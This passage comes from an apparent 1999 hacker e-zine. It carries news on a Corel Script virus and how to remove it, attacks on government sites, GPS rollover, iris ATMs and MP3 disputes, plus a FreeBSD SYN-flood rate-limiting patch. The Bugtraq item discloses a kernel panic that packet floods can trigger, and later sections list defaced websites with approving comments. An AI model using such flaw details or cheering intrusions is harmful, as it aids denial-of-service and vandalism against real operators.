can get it only by receiving an infected script file from another user via disk or download. When it triggers, all
the virus does is display text.

GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for Network Associates,
maker of McAfee Antivirus. The virus is rare, doesn't spread easily, and causes minimal damage, Viveros
says.

Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't launch automatically. You
have to run the infected script for it to spread. And the virus doesn't infect program files.

After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only, displaying seven lines from
J.R.R. Tolkien's The Lord of the Rings. As far as virus researchers have been able to ascertain, GaLaDRiel
does nothing else.

All major developers of antivirus software plan to add detection and removal of GaLaDRiel to their latest virus
updates within the next two weeks.

How to Check for the Virus

Corel recommends taking the following steps to see if your scripts have been infected and to remove the virus
if they have been:

1. Using Windows Explorer, browse the directory that contains the potentially infected scripts.

2. Right-click on a Corel script.csc file and select Open.

3. When the Corel Script Editor opens, examine the first line of the script. If the text begins with REM
ViRUS GaLaDRiel, then your script is infected.

4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM END OF ViRUS.

5. Resave your Corel Script file with the same name, overwriting the infected version.

6. Repeat the above steps for all .csc files in the same directory. (This final step is important, because running
any infected Corel Script file will infect all other .csc files in the same directory.)


@HWA

53.0 DoD labels attacks as 'nuisance'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

DOD Labels Attacks as "Nuisance"


contributed by erewhon
The Defense Information Agency's Joint Task Force for
Computer Network Defense has labeled the recent
attacks of DOD web sites by Chinese individuals as
nothing more than a nuisance and that the attacks
have had "no operational impact or effect."

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nuisance-5-13-99.html


MAY 13, 1999 . . . 18:40 EDT


Pentagon confirms 'nuisance' cyberattacks

BY BOB BREWIN (antenna@fcw.com)

The Pentagon identified what it called "nuisance-level" attacks against its
World Wide Web sites that resemble the attacks by Chinese hackers against
sites operated by the departments of Energy and Interior earlier this week.

In response to a query from FCW about any Chinese attacks against DOD
Web sites, a spokeswoman for the Defense Information Agency's Joint Task
Force for Computer Network Defense said, "We're aware of the activities you
mention. The JTF-CND has only a few isolated reports of activities across
DOD which might be attributed to these sources. The damage has been at the
'nuisance level' with no operational impact or effect."


The spokeswoman added that the JTF-CND would take action only when such
attacks would have a "widespread effect" on the Defense Information
Infrastructure, which comprises global DOD networks and information systems,
or when such attacks are spread broadly across network or information systems
operated by more than one of the services.

According to nongovernment network security experts, Chinese hackers
launched Web attacks earlier this week in response to the U.S. bombing of the
Chinese embassy in Belgrade.

@HWA

54.0 GPS's Y2K crisis comes early
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Jan 1, 2000 or Aug 21, 1999, which is worse?


contributed by Time L0rd
By now everyone has heard of Y2K. How many have
heard of August 21? That is the date when many
handheld GPS systems may go wacko. The GPS
satellites keep track of dates by measuring the number
of weeks elapsed since January 5-6, 1980. Every 1,024
weeks, the timer will resets to zero. The first time this
will happen is August 21. People suspect that older GPS
units may not be able to read this time accurately. (I
knew there was a reason I waited buy one)

CNN

Experts say consumers may
be hardest hit by GPS
computer time change

May 12, 1999
Web posted at: 7:35 PM EDT (2335 GMT)

WASHINGTON (AP) -- By now everyone knows about computers and
midnight, December 31. But what's going to happen on August 21?

That's when computer clocks roll over in the Global Positioning System, the
network of satellites that keeps ships and nuclear missiles on course and
provides precise time measurements for computer networks and public
utilities.

A joint congressional subcommittee held a hearing Wednesday to assess the
potential impact. It heard that while the military and space communities are
ready for the adjustment, consumers and small businesses may be the hardest
hit.

The Global Positioning System is made up of 24 orbiting satellites that allow
anyone with a GPS receiver to pinpoint their position on Earth. The satellites
keep track of dates by measuring the number of weeks elapsed since January
5-6, 1980. Every 1,024 weeks, the timer will reset to zero, which will occur for
the first time as August 21 turns to August 22.

"The satellites will not fall out of the sky, they will not lose their power," Keith
Rhodes, technical director in the Office of the Chief Scientist at the General
Accounting Office, told members of the House Science and Government
Reform committees. "The problem will be on the ground, with what you hold
in your hand."


Handheld receivers such as those popular with mountaineers, sailors and some
motorists are "probably going to have a problem" if they are more than five
years old, Rhodes said.

Also vulnerable are small computer networks that rely on GPS time signals, a
desirable form of time measurement because they are accurate to within
three-billionths of a second.

More widespread computer problems are expected a little more than four
months later, when the calendar changes from December 31, 1999, to January
1, 2000 -- the Y2K witching hour. Many computers originally programmed to
recognize only the last two digits of a year will not work properly beginning
January 1, 2000, when some machines will assume it is 1900 and could
therefore malfunction.

@HWA

55.0 Retinal Scans?
~~~~~~~~~~~~~~

Forget giving your sister your atm card to grab you some cash when you can't get out...

From HNN http://www.hackernews.com/

"Prepare for Retina Scan"


contributed by Shatner
No ATM card or PIN numbers needed. Bank United,
based in Texas, is the first to offer Iris scans at its
ATMs for its customers. Just walk up to the ATM, let
the computer check out your eyeball and withdraw
some dough. In response to questions about privacy
concerns, Bank United said the iris pictures will not be
distributed to anyone outside the bank. (Unless they
get subpoenaed or cracked, of course.)

Nando Times
http://www.techserver.com/story/body/0,1634,48513-78144-556814-0,00.html

Texas bank offers 1st eye-recognition ATM in U.S.

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By TERRI LANGFORD

HOUSTON (May 13, 1999 6:03 p.m. EDT http://www.nandotimes.com) - If you can't tell twins Michael
and Richard Swartz apart, do what Bank United of Texas does - look them in the eye. On Thursday,
the bank became the first in the United States to offer iris recognition technology at automated
teller machines, providing the Swartzes and other customers a cardless, password-free way to get
their money out of an ATM.

"It knows you just by looking at you," said Ron Koben, Bank United executive vice president.

The concept works because the intricate pattern of each person's iris is more distinctive than
even a fingerprint.

Here's how it works: A customer has a close-up photo of his eye taken at the bank, and the picture
is stored in a computer. When the customer goes up to the ATM to take out money, he presses a button
to start an eye scan. The ATM then matches the picture of the iris with the one stored in the bank's
database to confirm the customer's identity.

To demonstrate, Richard Swartz, a 25-year-old Rice University graduate student, had his iris
photographed by a bank employee. Minutes later, Swartz was able to withdraw $40 from his account
without inserting a card or punching in a secret code.

Then, Swartz's brother Michael walked up to the machine. But since his iris didn't match his brother's,
the ATM refused access.

Iris identification is already used at 11 banks outside the United States and may eventually be
extended to many other kinds of financial transactions.

Bank United hopes to have more eye-scanning ATMs up and running within the next year. Several other
banks in the United States are expected to unveil iris identification teller machines later this year.

"It has a very high cool factor," Koben said. "We think of it as James Bond meets stocks and bonds."

The iris recognition and software process was invented a few years ago by John Daughman of Cambridge
University in England. It is marketed in this country to financial institutions by Sensar Inc. of
Moorestown, N.J.

"This event clearly establishes iris identification as the emerging standard in personal electronic
identfication,"
said Robert Van Naarden, Sensar vice president of marketing and customer service. "Iris
identification is the most secure, robust and stable form of identification known to man."


In response to questions about privacy concerns, Bank United said the iris pictures will not be
distributed to anyone outside the bank.


@HWA


56.0 FreeBSD high speed SYNflood patch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Return-Path: <owner-bugtraq@netspace.org>
Date: Thu, 13 May 1999 11:35:43 -0700
Reply-To: Richard Steenbergen <humble@LIGHTNING.NET>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Richard Steenbergen <humble@LIGHTNING.NET>
Subject: SYN floods against FreeBSD
To: BUGTRAQ@netspace.org


Here's a quickie for the people who have been plagued with high bandwidth
syn flood attacks, a kernel patch for FreeBSD 3.1-STABLE which rate limits
SYN processing. Its messy but functional and I don't have time to make it
better (thats the fbsd developers job, not mine :P), cd /usr/src/sys,
patch < synlim, add "options SYN_RATELIM" (I highly recommend ICMP_BANDLIM
as well) to your kernel, recompile, and sysctl net.inet.tcp.synlim will be
available (default to 100). This is the maximium number of SYNs per second
that will be processed, the rest will be silently discarded. On my test
system (P2 450 running 3.1-stable being hit w/15,000 packets per sec),
this has successfully brought CPU usage from 100% to ~20% (against an open
port which is replying with unacknowledged ACKs).


Which brings us to the more sticky topic of kernel panics when under SYN
flood (which I believe to be the cause of some earlier posts from certain
people at Exodus Communications *cough*). Lord knows I found enough of
them when doing this testing, but the one that seems to be the biggie for
crashing when under syn flood is as follows (heh just turned off the
synlim and panic'd within 8 seconds while writing this):


panic: free: multiple frees
(kgdb) bt
#0 boot (howto=256) at ../../kern/kern_shutdown.c:285
#1 0xc0138c09 in panic (fmt=0xc02192b7 "free: multiple frees")
at ../../kern/kern_shutdown.c:446
#2 0xc0135aaf in free (addr=0xc0cdd600, type=0xc0239330)
at ../../kern/kern_malloc.c:333
#3 0xc01768f4 in ifafree (ifa=0xc0cdd600) at ../../net/route.c:262
#4 0xc0176876 in rtfree (rt=0xc34ce700) at ../../net/route.c:236
#5 0xc0176c84 in rtrequest (req=2, dst=0xc34cbac0, gateway=0xc34cbad0,
netmask=0x0, flags=393223, ret_nrt=0x0) at ../../net/route.c:536
#6 0xc017b34d in in_rtqkill (rn=0xc34ce700, rock=0xc0231610)
at ../../netinet/in_rmx.c:242
#7 0xc0176064 in rn_walktree (h=0xc0cd9e00, f=0xc017b2fc <in_rtqkill>,
w=0xc0231610) at ../../net/radix.c:956
#8 0xc017b3ec in in_rtqtimo (rock=0xc0cd9e00) at ../../netinet/in_rmx.c:283
#9 0xc013d19b in softclock () at ../../kern/kern_timeout.c:124


Which after a quick examination seems to be a perioditic routing table
cleanup. It seems that in_rtqtimo is scheduled to run every
net.inet.ip.rtexpire seconds (which is dynamicly adjusted and can never go
lower then net.inet.ip.rtminexpire). When the system is under heavy load
from processing lots of small packets (they don't even have to be SYNs,
anything which can get routed will do the trick, though the packet kiddies
would get very little gain from just sending an ip header since its going
to be padded to 64 bytes for the eth frame anyhow), this route cleanup
code will go wacking at routes it shouldn't and free some memory twice. In
the course of testing I've gotten my rtq_reallyold to -3 and seen lots of
"tvotohz: negative time difference -2 sec 0 usec". Perhaps someone with
free time or more specific knowledge of this area would like to FIX IT? =)


Perhaps when I get more free time I'll test some other *nix's. I would
really recommend putting all this rate limiting code at an ipfw level.


If you would like to contact me regarding this please use
humble@quadrunner.com (at least if you want a quick reply), thanks.


--
Richard Steenbergen <humble@lightning.net> humble@EFNet PGP ID: 0x741D0374
PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374
http://users.quadrunner.com/humble


synlim


*** conf/options.old Sat May 15 23:08:03 1999
--- conf/options Sat May 15 23:40:21 1999
***************
*** 68,73 ****
--- 68,74 ----
SYSVSHM opt_sysvipc.h
UCONSOLE
ICMP_BANDLIM
+ SYN_RATELIM

# POSIX kernel options
P1003_1B opt_posix.h
*** netinet/tcp_var.h.old Sat May 15 23:25:39 1999
--- netinet/tcp_var.h Sat May 15 23:45:05 1999
***************
*** 40,45 ****
--- 40,49 ----
* Kernel variables for tcp.
*/

+ #ifdef KERNEL
+ #include "opt_syn_ratelim.h"
+ #endif
+
/*
* Tcp control block, one per tcp; fields:
* Organized for 16 byte cacheline efficiency.
***************
*** 305,311 ****
#define TCPCTL_RECVSPACE 9 /* receive buffer space */

#define TCPCTL_KEEPINIT 10 /* receive buffer space */
#define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */
! #define TCPCTL_MAXID 12

#define TCPCTL_NAMES { \
{ 0, 0 }, \
--- 309,316 ----
#define TCPCTL_RECVSPACE 9 /* receive buffer space */
#define TCPCTL_KEEPINIT 10 /* receive buffer space */
#define TCPCTL_PCBLIST 11 /* list of all outstanding PCBs */
! #define TCPCTL_SYNLIM 12 /* Rate limiting of SYNs */
! #define TCPCTL_MAXID 13

#define TCPCTL_NAMES { \
{ 0, 0 }, \
***************
*** 320,325 ****
--- 325,331 ----
{ "recvspace", CTLTYPE_INT }, \
{ "keepinit", CTLTYPE_INT }, \
{ "pcblist", CTLTYPE_STRUCT }, \
+ { "synlim", CTLTYPE_INT }, \
}

#ifdef KERNEL
*** netinet/tcp_input.c.old Sat May 15 23:08:10 1999
--- netinet/tcp_input.c Sun May 16 01:33:51 1999
***************
*** 72,77 ****
--- 72,85 ----
static struct tcpiphdr tcp_saveti;
#endif

+ #ifdef SYN_RATELIM
+ static int synlim = 100;
+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RW, &synlim, 0, "");
+ #else
+ static int synlim = -1;
+ SYSCTL_INT(_net_inet_tcp, TCPCTL_SYNLIM, synlim, CTLFLAG_RD, &synlim, 0, "");
+ #endif
+
static int tcprexmtthresh = 3;
tcp_seq tcp_iss;
tcp_cc tcp_ccgen;
***************
*** 98,104 ****
struct tcpiphdr *, struct mbuf *));
static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *));
static void tcp_xmit_timer __P((struct tcpcb *, int));
!

/*
* Insert segment ti into reassembly queue of tcp with
--- 106,112 ----
struct tcpiphdr *, struct mbuf *));
static int tcp_reass __P((struct tcpcb *, struct tcpiphdr *, struct mbuf *));
static void tcp_xmit_timer __P((struct tcpcb *, int));
! static int syn_ratelim(void);

/*
* Insert segment ti into reassembly queue of tcp with
***************
*** 130,135 ****
--- 138,183 ----
} \
}

+ #ifdef SYN_RATELIM
+ int syn_ratelim(void)
+ {
+ static int lticks;
+ static int lpackets;
+ int dticks;
+
+ /*
+ * Return ok status if feature disabled or argument out of
+ * ranage.
+ */

+
+ if (synlim <= 0)
+ return(0);
+
+ dticks = ticks - lticks;
+
+ /*
+ * reset stats when cumulative dt exceeds one second.
+ */

+
+ if ((unsigned int)dticks > hz) {
+ if (lpackets > synlim)
+ printf("syn rate limit reached %d/%d pps\n", lpackets, synlim);
+ lticks = ticks;
+ lpackets = 0;
+ }
+
+ /*
+ * bump packet count
+ */

+
+ if (++lpackets > synlim) {
+ return(-1);
+ }
+
+ return(0);
+ }
+ #endif
+
static int
tcp_reass(tp, ti, m)
register struct tcpcb *tp;
***************
*** 379,384 ****
--- 427,438 ----
ip_fw_fwd_addr = NULL;
} else
#endif /* IPFIREWALL_FORWARD */
+
+ #ifdef SYN_RATELIM
+ if ((tiflags & TH_SYN) && !(tiflags & TH_ACK))
+ if (syn_ratelim() < 0)
+ goto drop;
+ #endif

inp = in_pcblookup_hash(&tcbinfo, ti->ti_src, ti->ti_sport,
ti->ti_dst, ti->ti_dport, 1);

@HWA

57.0 Industry rises up against MP3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I was waiting for this, it took them long enough but it looks like industry is finally waking up to
the threat of MP3 and are beginning to make some noise about it.

MUSIC BIZ BUILDS A TIME BOMB (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/19682.html


The Recording Industry Association of America is out to
exterminate MP3 -- and is pressuring hardware and software
makers to build in a "kill switch" that would take care of
it once and for all. By Christopher Jones.

Music Biz Builds A Time Bomb
by Christopher Jones

3:00 a.m. 14.May.99.PDT
The future of digital music delivery is at stake as technology companies and record labels try to bridge
their multibillion-dollar industries. But the two sides are making little progress, reports one tech-
industry insider, who says that the music industry is taking a "my way or the highway" approach.

Facing the loss of its lucrative distribution chains and existing contracts with retailers, the record
industry has a plan to force hardware and software companies to exclusively adopt its Secure Digital Music
Initiative as the standard for delivering music online.


At last week's SDMI meeting in London, a handpicked committee proposed a plan that could force hardware and
software developers to choose among wannabe SDMI, the de facto standard MP3, or a different compressed file
format for the development of digital music players and similar hardware.

SDMI backers want manufacturers to build a time-bomb trigger into their products that, when activated at a
later date, would prevent users from downloading or playing non-SDMI-compliant music. The hardware would
initially support MP3 and other compressed file formats, but a signal from the RIAA would activate the
blocking trigger.

Hardware and software developers that refuse to build in the switch would not have access to the SDMI
specifications or the major-label music that will be made available when the specification is complete.

According to a source who attended the SDMI meeting last week, participants discovered that the Internet and
music industries have precious little in common. Coming to a consensus on the delivery of digital music may
be all but impossible, said the source, who requested anonymity.

Committee members from the technology industry were convinced that record labels don't "get" the Internet,
where open standards are the norm. Others were upset that the subcommittee was so exclusive. Microsoft,
Lucent, and a handful of PC manufacturers were the only technology companies present in sessions dominated
by the RIAA and its record labels.

"There was a lot of distaste around the room and loud conversations in the hallway with Leo [Leonardo
Chiariglione, executive director of SDMI] and Cary [Sherman, senior executive vice president for the RIAA],"

the source said.

The RIAA refused to comment on the negotiations.

"Ultimately, if it continues down this path, there will be an unworkable solution for the customers," said
the SDMI source. "Will I buy a Rio that supports MP3, or possibly a Samsung player that does not? The labels
are concerned about their distribution channels and how the stores will treat them. But while there are 30,000
titles in brick-and-mortar, the labels own 10 times that."


Another source who attended the meeting, and who also asked to remain anonymous, said that PC and hardware
makers are resisting the RIAA's plans because they see an immediate market for MP3-based players. Already there
are many players on the street and under development, and the market for selling legitimate MP3 music and
products is in its infancy.

"This transition group asked the question, 'do we ban MP3s?' and the answer was a clear and resounding 'no'
from PC makers. They are not going to drop support for MP3 anytime soon, and more and more manufacturers want
to have players ready for Christmas,"
said the source. For other companies caught in the middle of the debate,
the issues were not so clear-cut. "With companies like Sony, that sell both content and hardware and are on both
sides of the battle, it's very interesting,"
the source said.

The initial SDMI specification for portable players is due by the end of June, and a full-blown architecture by
March 2000. There are several encryption and security companies currently working on the proposed trigger device
that will present their solutions within the next few weeks. The next SDMI meeting is scheduled for next week in
Washington.

"This reminds me of the early days of the CD recording market, with all the different file formats and people
jockeying for position. The same thing is happening here, but there are 250 participants,"
said Dave Ulmer,
general manager of Adaptec's software products group, who was at the SDMI meeting in London. "There are companies
that see their future hinging on being part of this SDMI solution, and others just want to know what it is."


One source said that "there is no way in hell" that SDMI-compliant products will be ready for the Christmas
season because "the individuals involved in these conversations are too concerned about their interests and [are]
not looking for a real solution. Some guy with a digital kiosk wants everything for kiosks, and another guy with
encryption wants his stuff in, and so on."


Steve Grady, vice president of marketing at MP3 retailer GoodNoise, said that if the record labels don't put the
consumer first in their architecture plans, piracy will only increase and the industry could ultimately lose out
on new business opportunities on the Web.

"The problem is that you're talking about consumers and people adopting a technology and using music in a certain
way. But you have to stay focused on the consumer here. What you're competing against is free product, and that
won't go away,"
Grady said. "Something better than MP3 will come along. The ability to move music around is key,
and if you try to force something that has attributes they don't want, it won't be successful."


While the SDMI specification may ultimately become the standard for the music industry, there is no guarantee that
it has the inside track.

During the past few weeks, recording industry companies have formed alliances that could undermine SDMI's acceptance.
Lucent teamed up with the Universal Music Group, while Microsoft allied with Sony on content distribution deals.

In the coming months, the SDMI equation could get even more complicated if the major labels decide to go their own way.

"What's interesting is Universal and Sony. It's like the Oklahoma land rush with their marketing power and Microsoft's
monopoly,"
said one source. "If they get the market to adopt their standard, it's wide open. I don't think SDMI has a
lock on what the standard will be."


"Welcome to the software business," was the general sentiment among sources who recalled the similar battles over
standards within the Internet industry.

"[It's] turning into the Unix battle of the music industry," said one source, who said that ultimately open standards
will prevail. "Any company that tries [proprietary formats] realizes it fails. Look at IBM, one of the oldest computer
companies, and they've embraced the Web. It's a hard lesson, and the labels may have to learn it."


The RIAA has made it clear that it's willing to fight for its interests in the courts. It has the money and the muscle
to try to convince technology companies and Internet music vendors to see things its way. But just the same, it may not
win the battle.

"There is a big gap in the way major labels think about the world and what's going on today on the Internet. For all
the discussion on format battles, is there really a battle going on in the consumer space?"
Grady said.

"There is only one player right now, and it's MP3. The only battle is taking place is in meeting rooms. The Internet is
a different environment, and the labels need to understand the culture and what you are dealing with here,"
Grady said.



@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
******************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************

<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx

http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>

* * * * * * * * * * *

  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Attack of the Tuxissa Virus
March 29, 1999

What started out as a prank posting to
comp.os.linux.advocacy yesterday has turned into one of the
most significant viruses in computing history. The
creator of the virus, who goes by the moniker "Anonymous
Longhair"
, modified the well-known Melissa[1] virus to
download and install Linux on infected machines.

"It's a work of art," one Linux advocate told Humorix after
he looked through the Tuxissa virus source code. "This
virus goes well beyond the feeble troublemaking of
Melissa."
The advocate enumerated some of the tasks the
virus performs in the background while the user is
blissfully playing Solitaire:

Once the virus is activated, it first works on propogating
itself. It has a built-in email harvesting module that
downloads all the pages referenced in the user's Internet
Explorer bookmarks and scans them for email addresses.
Using Outlook, the virus sends a copy of itself to every
email address it comes across.

After it has successfully reproduced, the virus begins the
tricky process of upgrading the system to Linux. First,
the virus modifies AUTOEXEC.BAT so that the virus will be
re-activated if the system crashes or is shut down while
the upgrade is in process. Second, the virus downloads a
stripped-down Slackware distribution, using a lengthy list
of mirror sites to prevent the virus from overloading any
one server.

Then the virus configures a UMSDOS filesystem to install
Linux on. Since this filesystem resides on a FAT
partition, there is no need to re-partition the hard drive,
one of the few actions that the Word macro langugage
doesn't allow.

Next, the virus uncompresses the downloaded files into the
new Linux filesystem. The virus then permanently deletes
all copies of the Windows Registry, virtually preventing
the user from booting into Windows without a re-install.
After modifying the boot sector, the virus terminates its
own life by rebooting the system. The computer boots into
the Slackware setup program, which automatically finishes
the installation of Linux. Finally, the dazed user is
presented with the Linux login prompt and the text,
"Welcome to Linux. You'll never want to use Windows again.
Type 'root' to begin..."


The whole process take about two hours, assuming the user
has a decent Internet connection. Since the virus runs
invisibly in the background, the user has no chance to stop
it until it's too late.

The email message that the virus is attached to has the
subject "Important Message About Windows Security". The
text of the body says, "I want to let you know about some
security problems I've uncovered in Windows 95/98/NT,
Office 95/97, and Outlook. It's critically important that
you protect your system against these attacks. Visit these
sites for more information..."
The rest of the message
contains 42 links to sites about Linux and free software.

Slashdot is one of those links. "That could spell
trouble,"
one Slashdot expert told Humorix. "Slashdot
could fall victim to the new 'Macro Virus Effect' if this
virus continues to propogate at its present exponential
growth rate. Red Hat's portal site, another site present
on the virus' links list, seems to be quite sluggish right
now..."


Details on how the virus started are a bit sketchy. The
"Anonymous Longhair" who created it only posted it to
Usenet as an early April Fool's gag, a demonstration of how
easy it would be to mount a "Linux revolution". Some other
Usenet reader is responsible for actually spreading the
virus into the wild. One observer speculated, "I imagine
the virus was first sent to the addresses of several
well-known spammers. The virus probably latched on to the
spammer's email lists and began propagating at a fantastic
rate. With no boundary to its growth, this thing could
wind up infecting every single Net-connected Wintel box in
the world. Wouldn't that be a shame!"


Linus Torvalds, who just left for a two week vacation, was
unavailable for comment at press time. We have a strong
feeling that his vacation will be cut short very soon...


[1] http://linuxtoday.com/stories/4463.html

---

James S. Baughn
http://i-want-a-website.com/about-linux/







@HWA



SITE.1 http://smog.cjb.net/
~~~~~~~~~~~~~~~~~~~~

Smogzer's site. this site has news bytes from a wide range of interesting areas
from Science and techno to security everything from Sony's new robot dog to the
new Windump windows version of tcpdump is reported here, check it out...the graphics
are pleasing and the site is well laid out, go there now, you know you want to...

http://smog.cjb.net/

@HWA



H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)


Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...


May 10th


Over the weekend some people were really busy...


From HNN's rumour section http://www.hackernews.com/
contributed by Anonymous


Cracked
It has a been a busy weekend for some. Plenty of military and government servers and quite a
few new names popping up. A smattering international servers and even mass domain creacks.
Here is the loooong list of servers that have been reported as cracked.

http://dailymp3z.net/
http://phoenix.placement.oakland.edu/
http://www.mursuky.edu
http://www.abstractcomputers.com
http://www.mursuky.edu
http://www.naturalbornassholes.com
http://www.usembassy-china.org.cn/
http://www.abstract.ab.ca
http://www.helio.com
http://lhs.vboard.com
http://ocse.acf.dhhs.gov
http://www.telephone.sk
http://www.uvd.com.hk
http://www.cowbells.com
http://www.cookieman.com
http://www.jimmyhollywood.com
http://www.bam.nl
http://www.boxman.nl
http://www.centraalbeheer.nl
http://www.clic.nl
http://sony.clic.nl
http://www.cmg.nl
http://www.defcom.nl
http://www.dmsa.nl
http://www.vitae.nl
http://www.hcmaatschap.nl
http://www.preview.nl
http://www.thehealing.nl
http://www.pds.nl
http://www.graphichat.com
http://www.helio.com
http://www.pagemate.com
http://www.thehealing.com
http://www.yousee.com
http://www.mount.n-yorks.sch.uk
http://www.I-spy.net
http://www.tax99.co.uk
http://www.spyteam.co.uk
http://www.sybase.it/
http://www.cool.co.il
http://www.worldclassbeauties.com
http://admin.engr.wisc.edu/
http://www.ntc.cap.af.mil/
http://www.sm.nps.navy.mil/
http://www.eh.doe.gov/
http://www.pwcyoko.navy.mil/
http://www.nem.barc.usda.gov/
http://safetynet.smis.doi.gov/
http://www.landersoil.com
http://www.webspace.it
http://www.motophoto.com
http://www.mount.n-yorks.sch.uk
http://www.cse.ca
http://ntcsslab.nosc.mil
http://sfbay.wr.usgs.gov
http://www.I-spy.net
http://www.netcom.be
http://www.spyteam.co.uk
http://www.tax99.co.uk
http://www.cowbells.com
http://www.cookieman.com
http://www.jimmyhollywood.com
http://ecure.bayareagold.com


May 11th

From HNN rumours section

Cracked
The following site have been reported to HNN as
cracked.
http://ucnexus.berkeley.edu
http://www.scandi.com.mx
http://www.tdpnet.com
http://www.corel.com
http://www.whitehouse.gov
http://ns1.tornado.ie/


May 12th

From HNN rumours section

contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.nacced.org/
http://christianfamily.faithweb.com
http://ns1.tornado.ie
http://www.landersoil.com
http://www.lcpages.com


May 13th
From HNN rumours section;
contributed by Anonymous
Cracked
The following sites have been reported to HNN as
cracked.
http://hfobr.com
http://middletown.org
http://www.arcon.ru
http://www.cyberflirt.net
http://www.vboard.com
http://armstrong.scu.edu
http://www.autosportmag.com
http://www.sba.oakland.edu
http://www.des.uwm.edu
http://ceis.ha.osd.mil
